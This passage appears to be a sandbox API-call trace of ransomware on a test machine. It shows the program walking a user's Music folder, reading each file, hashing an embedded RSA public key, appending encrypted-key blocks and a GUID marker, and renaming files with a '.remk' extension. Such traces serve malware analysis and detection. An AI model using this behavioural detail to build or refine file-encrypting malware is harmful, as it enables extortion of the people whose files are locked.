(HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1d8 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee238 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee208 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee250 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1f0 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee208 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee220 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee250 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee238 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c1f80 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.619] WriteFile (in: hFile=0x640, lpBuffer=0x37bb408*, nNumberOfBytesToWrite=0x56f8, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37bb408*, lpNumberOfBytesWritten=0x3adfb14*=0x56f8, lpOverlapped=0x0) returned 1 [0232.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb408 | out: hHeap=0x630000) returned 1 [0232.620] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x56fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.620] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.620] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.620] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.620] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.620] CloseHandle (hObject=0x640) returned 1 [0232.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0232.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3ec8 | out: hHeap=0x630000) returned 1 [0232.622] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\erxVno osH7s5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\erxvno osh7s5.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\erxVno osH7s5.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\erxvno osh7s5.mp3.remk")) returned 1 [0232.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.623] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.624] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139ed60, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x2cf49ce0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x2cf49ce0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gg6LaR4dxDzOQomZJ1UL", cAlternateFileName="GG6LAR~1")) returned 1 [0232.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0232.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0232.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.624] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23666f60, ftCreationTime.dwHighDateTime=0x1d5d9c8, ftLastAccessTime.dwLowDateTime=0xd5c4fc90, ftLastAccessTime.dwHighDateTime=0x1d5e33b, ftLastWriteTime.dwLowDateTime=0xd5c4fc90, ftLastWriteTime.dwHighDateTime=0x1d5e33b, nFileSizeHigh=0x0, nFileSizeLow=0x15ae0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nZea.m4a", cAlternateFileName="")) returned 1 [0232.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.624] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nZea.m4a") returned=".m4a" [0232.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nZea.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nzea.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.625] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=88800) returned 1 [0232.625] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.627] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15aba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.627] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.629] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.629] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x15ae0, lpOverlapped=0x0) returned 1 [0232.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.631] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.632] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.632] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.632] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.632] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.632] GetLastError () returned 0x0 [0232.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.632] GetLastError () returned 0x0 [0232.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.632] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.632] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.632] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.632] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.633] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15ae0) returned 0x37c2278 [0232.633] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1f80 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1fc8 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1d8 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee238 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.634] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee238 | out: hHeap=0x630000) returned 1 [0232.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee238 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1f0 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee1d8 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.635] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15ae0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.635] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.636] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.636] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.636] CloseHandle (hObject=0x640) returned 1 [0232.638] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nZea.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nzea.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nZea.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nzea.m4a.remk")) returned 1 [0232.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.639] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: 